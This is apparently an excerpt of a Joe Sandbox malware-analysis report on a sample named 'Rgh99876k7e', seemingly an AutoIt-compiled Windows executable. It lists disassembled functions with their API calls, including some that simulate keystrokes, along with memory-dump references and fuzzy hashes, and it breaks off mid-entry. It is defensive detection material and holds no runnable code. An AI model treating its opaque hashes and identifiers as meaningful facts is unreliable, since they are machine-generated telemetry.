                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00722D4B
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00722D53
                          • _ValidateLocalCookies.LIBCMT ref: 00722DE1
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00722E0C
                          • _ValidateLocalCookies.LIBCMT ref: 00722E61
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: &Hr$csm
                          • API String ID: 1170836740-2624131954
                          • Opcode ID: 37ac7fd3d945a1a42cd87fe80ca86722f841a8e228d9abb5e35e400245ae8da7
                          • Instruction ID: 86847963db5a3abc110eb6568490f66add2d6c23c55c3b7c64a5667e71d44738
                          • Opcode Fuzzy Hash: 37ac7fd3d945a1a42cd87fe80ca86722f841a8e228d9abb5e35e400245ae8da7
                          • Instruction Fuzzy Hash: 9E418334E00229FBCF10DF68D849A9EBBA5BF45324F148155E8156B353D739EA46CBD0
                          Function 0076C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • LoadIconW.USER32(00000000,00007F03), ref: 0076C913
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconLoad
                          • String ID: blank$info$question$stop$warning
                          • API String ID: 2457776203-404129466
                          • Opcode ID: a71c3ee1a32fd73c004c423391a342e2b060e9879d1d73195fb7c204b1048413
                          • Instruction ID: b8626778817fa9e7e30473f6ac74a8b68f062933c328ec9b63f7d807d388e3f2
                          • Opcode Fuzzy Hash: a71c3ee1a32fd73c004c423391a342e2b060e9879d1d73195fb7c204b1048413
                          • Instruction Fuzzy Hash: 3B11EB31689307BEE7079B54EC82DBA77ACDF15354B10442FFD45B6182E77C6D005268
                          Function 0076ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _wcslen$LocalTime
                          • String ID:
                          • API String ID: 952045576-0
                          • Opcode ID: 7363f1402170ffaffbd9d018d4c138f2778207ea2bbb089029ab747344389db5
                          • Instruction ID: 856d120efab0fbac2be38d14af8a2106b9973fd9f608d536046476692f565d09
                          • Opcode Fuzzy Hash: 7363f1402170ffaffbd9d018d4c138f2778207ea2bbb089029ab747344389db5
                          • Instruction Fuzzy Hash: B341A266C10228F5DB11EBF4988E9CFB7E8AF45310F508466E919E3122FB3CE645C3A5
                          Function 0071F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                          Download Yara Rule
                          APIs
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0071F953
                          • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F3D1
                          • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0075682C,00000004,00000000,00000000), ref: 0075F454
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ShowWindow
                          • String ID:
                          • API String ID: 1268545403-0
                          • Opcode ID: 2401d1a2b1cb3b145bbded8364c0454772fd690d7376c581ecb03c3464b82545
                          • Instruction ID: e9a27ea539262d2f1763f259456e58b12cc118c852ba33a1bed6a4ffff9446cd
                          • Opcode Fuzzy Hash: 2401d1a2b1cb3b145bbded8364c0454772fd690d7376c581ecb03c3464b82545
                          • Instruction Fuzzy Hash: 03413B31608680BEDB35BB2DC8887EA7B91AB46321F58843DE447D65E0C67DB8C5CB11
                          Function 00792D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                          Download Yara Rule
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 00792D1B
                          • GetDC.USER32(00000000), ref: 00792D23
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00792D2E
                          • ReleaseDC.USER32(00000000,00000000), ref: 00792D3A
                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00792D76
                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00792D87
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00795A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00792DC2
                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00792DE1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                          • String ID:
                          • API String ID: 3864802216-0
                          • Opcode ID: 634a25489a0ee486c357d5b6ae2562c5c8226bba9c19b8c4e56a19ec79c71448
                          • Instruction ID: 8447b848d35725bca33094112023729ee1646bf39fcc83938b6d65f7ed034ba6
                          • Opcode Fuzzy Hash: 634a25489a0ee486c357d5b6ae2562c5c8226bba9c19b8c4e56a19ec79c71448
                          • Instruction Fuzzy Hash: 8C317C72201214BFEF158F54DC8AFEB3BA9EF09715F048056FE089A291C6799C52CBB4
                          Function 00765622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: _memcmp
                          • String ID:
                          • API String ID: 2931989736-0
                          • Opcode ID: e6f01c9c9030353040ce0c36037365731a0eec829abc133864cb8e94b6b38a87
                          • Instruction ID: fd8a5b8d7bc634fa574ad40e795c532d3b4e672e625b11998e9445ed9b85020e
                          • Opcode Fuzzy Hash: e6f01c9c9030353040ce0c36037365731a0eec829abc133864cb8e94b6b38a87
                          • Instruction Fuzzy Hash: F821CCA1640915B7D6149520ED86FFA335DBF31794F444020FD06AA642F72CEE24D6B5
                          Function 00784FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152
                          • Opcode ID: b8aa45149c8a093c63da3477bb25b87b7a795caa2edb5eb4fb37ead3cf90de31
                          • Instruction ID: 5c31be95a8aaa73bb6def6554f9cd20013f1b4b2d34658536c01af1e5f5df815
                          • Opcode Fuzzy Hash: b8aa45149c8a093c63da3477bb25b87b7a795caa2edb5eb4fb37ead3cf90de31
                          • Instruction Fuzzy Hash: 5CD1D271A4060A9FDF10DFA8C885BAEB7B5BF48354F148069E915EB281E774DD41CB90
                          Function 00741522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                          Download Yara Rule
                          APIs
                          • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007415CE
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741651
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007417FB,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416E4
                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007416FB
                            • Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444,?,0071FDF5,?,?,0070A976,00000010,007D1440,007013FC,?,007013C6,?,00701129), ref: 00733852
                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00741777
                          • __freea.LIBCMT ref: 007417A2
                          • __freea.LIBCMT ref: 007417AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                          • String ID:
                          • API String ID: 2829977744-0
                          • Opcode ID: d028e08f0a2608723cf43bd6b84ec53d629271b46ecf59ad797cc1182c3d7d4d
                          • Instruction ID: dd5dfa483631979d1a5633e182ef60e48ee0e4db5ce0b9307b59cd1dbf559466
                          • Opcode Fuzzy Hash: d028e08f0a2608723cf43bd6b84ec53d629271b46ecf59ad797cc1182c3d7d4d
                          • Instruction Fuzzy Hash: 1491D571E002169ADF21AE74CC85AFEBBB59F49350F984659E805E7141EB3DCDC0CB61
                          Function 00784523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInit
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2610073882-625585964
                          • Opcode ID: 5b4e460ffb4d3e581c22c08b1efa47fb2adf05bbfd40ab21d769d510eaa89057
                          • Instruction ID: 9475ae0a1b7d8a4a4ee42fc002dd593fcab466cf7a9d1378545add5c79838c91
                          • Opcode Fuzzy Hash: 5b4e460ffb4d3e581c22c08b1efa47fb2adf05bbfd40ab21d769d510eaa89057
                          • Instruction Fuzzy Hash: 65918171A4021AEBDF24DFA5CC48FAEBBB8EF45710F108559F515AB280D7B89941CFA0
                          Function 00771187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0077125C
                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00771284
                          • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007712A8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007712D8
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0077135F
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007713C4
                          • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00771430
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ArraySafe$Data$Access$UnaccessVartype
                          • String ID:
                          • API String ID: 2550207440-0
                          • Opcode ID: 3770f7eca4167d7ffcf4a1baedd7ed6adcba392134842b8ff22ac0691ff375e5
                          • Instruction ID: ae14ca0562d77cd7ce8b16b9940ddfeb7ddff0c1689ccc5c99bf531b8ebc9169
                          • Opcode Fuzzy Hash: 3770f7eca4167d7ffcf4a1baedd7ed6adcba392134842b8ff22ac0691ff375e5
                          • Instruction Fuzzy Hash: A891BF71A00219EFDF019FA8C888BBE77B5FF45365F548029E944EB292D77CA941CB90
                          Function 0071948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: e25ce3f8d63f0b8efca2aa2306a87d59838fd51a6805274f9aaa64cac7a6efc8
                          • Instruction ID: a50ad4e5b81404171015228779d232f2db695937a4981d597695a681cc57091c
                          • Opcode Fuzzy Hash: e25ce3f8d63f0b8efca2aa2306a87d59838fd51a6805274f9aaa64cac7a6efc8
                          • Instruction Fuzzy Hash: 33914D71D00219EFCB15CFA9CC84AEEBBB9FF49320F148055E915B7291D378A992CB60
                          Function 00783947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0078396B
                          • CharUpperBuffW.USER32(?,?), ref: 00783A7A
                          • _wcslen.LIBCMT ref: 00783A8A
                          • VariantClear.OLEAUT32(?), ref: 00783C1F
                            • Part of subcall function 00770CDF: VariantInit.OLEAUT32(00000000), ref: 00770D1F
                            • Part of subcall function 00770CDF: VariantCopy.OLEAUT32(?,?), ref: 00770D28
                            • Part of subcall function 00770CDF: VariantClear.OLEAUT32(?), ref: 00770D34
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4137639002-1221869570
                          • Opcode ID: 76bc079fdb120d813a02c576a933949c81759acc94e3c1873fcbd9e18694c4b5
                          • Instruction ID: 3d67220ff4e0e3f63282623901eaf05152ae29c8cc574039fb1d4eb5d663af5b
                          • Opcode Fuzzy Hash: 76bc079fdb120d813a02c576a933949c81759acc94e3c1873fcbd9e18694c4b5
                          • Instruction Fuzzy Hash: 02913875608305DFCB04EF28C48596ABBE4BF88714F14892DF88997391DB39EE45CB92
                          Function 00784BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0076000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?,?,0076035E), ref: 0076002B
                            • Part of subcall function 0076000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760046
                            • Part of subcall function 0076000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?,?), ref: 00760054
                            • Part of subcall function 0076000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0075FF41,80070057,?), ref: 00760064
                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00784C51
                          • _wcslen.LIBCMT ref: 00784D59
                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00784DCF
                          • CoTaskMemFree.OLE32(?), ref: 00784DDA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                          • String ID: NULL Pointer assignment
                          • API String ID: 614568839-2785691316
                          • Opcode ID: 7aa1165678ecc16e13d6f0bea89fa5a2a6c96702d47229824835f80e6e17eb08
                          • Instruction ID: 6f7b19eac0b6b5fb17e2374ac4fa77d202f97e02c2f9f6ef3f70e982cc288637
                          • Opcode Fuzzy Hash: 7aa1165678ecc16e13d6f0bea89fa5a2a6c96702d47229824835f80e6e17eb08
                          • Instruction Fuzzy Hash: 75912A71D00219EFDF11EFA4D894AEEB7B8BF08310F108269E915A7281DB785A45CF60
                          Function 007920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetMenu.USER32(?), ref: 00792183
                          • GetMenuItemCount.USER32(00000000), ref: 007921B5
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007921DD
                          • _wcslen.LIBCMT ref: 00792213
                          • GetMenuItemID.USER32(?,?), ref: 0079224D
                          • GetSubMenu.USER32(?,?), ref: 0079225B
                            • Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
                            • Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
                            • Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65
                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007922E3
                            • Part of subcall function 0076E97B: Sleep.KERNEL32 ref: 0076E9F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                          • String ID:
                          • API String ID: 4196846111-0
                          • Opcode ID: df17f709c7f30f52c34446dccfd7cdeaaa45a6888dfa250d8c7eb8fb9a9ae67c
                          • Instruction ID: c02da691e3880042b75ef810b8381c8a7299fce56361038d4af54761d0493522
                          • Opcode Fuzzy Hash: df17f709c7f30f52c34446dccfd7cdeaaa45a6888dfa250d8c7eb8fb9a9ae67c
                          • Instruction Fuzzy Hash: 21715E75A00205EFCF15EF64D845AAEB7F5FF48310F158459E816EB352DB38AD428B90
                          Function 0076AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(?), ref: 0076AEF9
                          • GetKeyboardState.USER32(?), ref: 0076AF0E
                          • SetKeyboardState.USER32(?), ref: 0076AF6F
                          • PostMessageW.USER32(?,00000101,00000010,?), ref: 0076AF9D
                          • PostMessageW.USER32(?,00000101,00000011,?), ref: 0076AFBC
                          • PostMessageW.USER32(?,00000101,00000012,?), ref: 0076AFFD
                          • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0076B020
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
                          • String ID:
                          • API String ID: 87235514-0
                          • Opcode ID: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
                          • Instruction ID: 38061849984ea82d457facf333d4095ea81d26e52839b3df763786fe5f66a104
                          • Opcode Fuzzy Hash: 83b52e91c038923cc1081deaac57c98e248eb650b1b3fd8534e5b6aba425f987
                          • Instruction Fuzzy Hash: E951B3A0A047D53DFB3642348C45BBA7EE96B06304F088589F9D6A54C3D3ADECC8DB52
                          Function 0076ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32(00000000), ref: 0076AD19
                          • GetKeyboardState.USER32(?), ref: 0076AD2E
                          • SetKeyboardState.USER32(?), ref: 0076AD8F
                          • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0076ADBB
                          • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0076ADD8
                          • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0076AE17
                          • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0076AE38
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: MessagePost$KeyboardState$Parent
